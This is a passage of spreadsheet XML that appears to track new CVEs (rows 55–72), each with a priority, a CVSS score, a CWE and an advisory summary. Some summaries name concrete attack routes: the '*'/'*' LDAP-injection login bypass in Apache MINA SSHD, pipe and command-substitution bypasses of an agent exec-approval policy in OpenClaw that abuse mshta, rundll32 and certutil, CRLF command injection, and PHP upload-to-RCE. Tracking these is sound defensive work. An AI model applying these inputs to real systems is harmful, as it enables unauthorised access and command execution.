        <is>
          <t>Authentication bypass via LDAP injection in component sshd-ldap in Apache MINA SSHD versions 1.2.0 to 2.19.0 and 3.0.0-M1 to 3.0.0-M5.
Apache MINA SSHD is a Java library for client-side and server-side SSH. 
The optional sshd-ldap component provides support for integrating 
password and publickey authentication on the server side with an LDAP 
server.
sshd-ldap is an optional component. SSH servers implemented with Apache 
MINA SSHD are affected only if they use sshd-ldap and do configure it to be used for password of public key authentication.
Other Apache MINA SSHD servers are not affected.
Lack of escaping LDAP filter metacharacters enabled successful authentication with username "*" and password "*".
Users are recommended to upgrade affected applications to version 2.20.0 or 3.0.0-M6, which fix this issue by properly escaping filter parameters according to RFC 4515.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94053</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97196</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-1289</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>Improper Validation of Unsafe Equivalence in Input vulnerability in Liquid Web / StellarWP GiveWP allows Authentication Bypass.
This issue affects GiveWP: from n/a through 4.16.9.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97196</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55176</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Soft Machine is a Virtual Machine–based agentic development environment / Cloud OS. In versions 0.2.247 and prior, two authentication helpers in /app/server.js — verifyContainerAuth() and authenticateWorkspaceHttp() — accept the global CONTAINER_SHARED_SECRET as a bearer token without verifying which workspace the caller belongs to. Because that secret is set identically on every container in the Fly app and is reachable from the user-facing process environment inside each workspace, any tenant can use it to authenticate to any other tenant's workspace API. The result is cross-workspace read, write, and destructive-restore primitives reachable from any paying customer's shell. The existing per-workspace token check (workspaceTokenMatches) protects the user-facing per-workspace token path, but the shared-secret bearer path bypasses it entirely. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55176</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94389</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Remote Code Execution (RCE) in AcyMailing SMTP Newsletter &lt;= 11.0.5 versions.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94389</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100277</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 account takeover was possible by replaying a notification signature</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100277</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13313</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-489</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>An Active Debug Code vulnerability in certain ASUS router models allows a remote authenticated user, via a crafted HTTP request, to bypass security mechanisms and enable the Telnet service, thereby executing arbitrary commands with root privileges and potentially affecting other devices connected to the router.
Refer to the ' Security Update for ASUS Router Firmware ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13313</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100253</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>In JetBrains TeamCity before 2026.2, 
2026.1.4, 
2025.11.8 sandbox escape leading to code execution was possible via the versioned settings Kotlin DSL</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100253</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100254</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>In JetBrains TeamCity before 2026.2, 
2026.1.4, 
2025.11.8 authenticated users could execute commands on Windows servers via CRLF injection in Pipeline Git connection settings</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100254</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101880</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>8.800000000000001</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2026-09-30</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node before 2026.7.1 contains an incorrect authorization vulnerability in the system.run exec-approval policy where ExecShellWrapperParser fails to split commands on pipe operators or extract command substitutions. Connected gateways or agents can bypass approval rules by placing denied commands behind allowed prefixes using pipe operators or command substitution syntax, achieving arbitrary command execution on Windows hosts.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101880</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101882</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>8.800000000000001</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2026-09-30</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node before 2026.7.1 contains an incomplete validation vulnerability in system.execApprovals.set that accepts wildcard-executable rules and abusable system binaries like mshta, rundll32, and certutil. Remote callers can add broad allow rules to execute arbitrary commands on the Windows host through system.run without operator checks or user prompts.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101882</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102120</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-78</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>A privilege escalation vulnerability in Kiteworks could have allowed an attacker who had already obtained code execution on one node of a clustered Kiteworks deployment to run operating system commands with elevated privileges on another node of the same cluster. Insufficient input validation in an internal cluster management function let attacker-supplied values reach a privileged execution context; exploitation requires existing access to a node in the cluster, and the affected function is not reachable from outside the cluster.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102120</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102125</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-653, CWE-668</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>The sandbox that isolates document conversion on a Kiteworks appliance did not fully confine the code running inside it. Code already executing within that sandbox could potentially escape its confinement and act with the privileges of the service account that runs the application, which could allow an attacker in that position to read or modify application data and configuration, or to disrupt the service on the affected appliance.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102125</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102377</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Photo Gallery by 10Web &lt;= 1.8.46 versions.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102377</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103474</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>yii2-starter-kit through 4.2.0 fails to validate file types in the backend storage upload actions, allowing authenticated managers to upload PHP files. Attackers with manager role can upload PHP scripts to the web-accessible storage directory and request them to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103474</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18783</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function vulnerability in Trex Digital Smart Manufacturing Systems Inc. Trex MES allows Authentication Bypass.
This issue affects Trex MES: through 2026-09-29.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18783</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80275</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>db4dfee8-a97e-4877-bfae-eba6d14a2166</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-425</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>Comelit Multi-User Gateway for VIP System (model 1456B) firmware versions 2.9.1 and 2.10.0 fail to enforce server-side authorization on an administrative password-change function. An authenticated user level can invoke this function to overwrite the installer (administrator) account password.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80275</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94076</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in SEO Plugin by Squirrly SEO &lt;= 14.2.5 versions.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94076</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94121</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
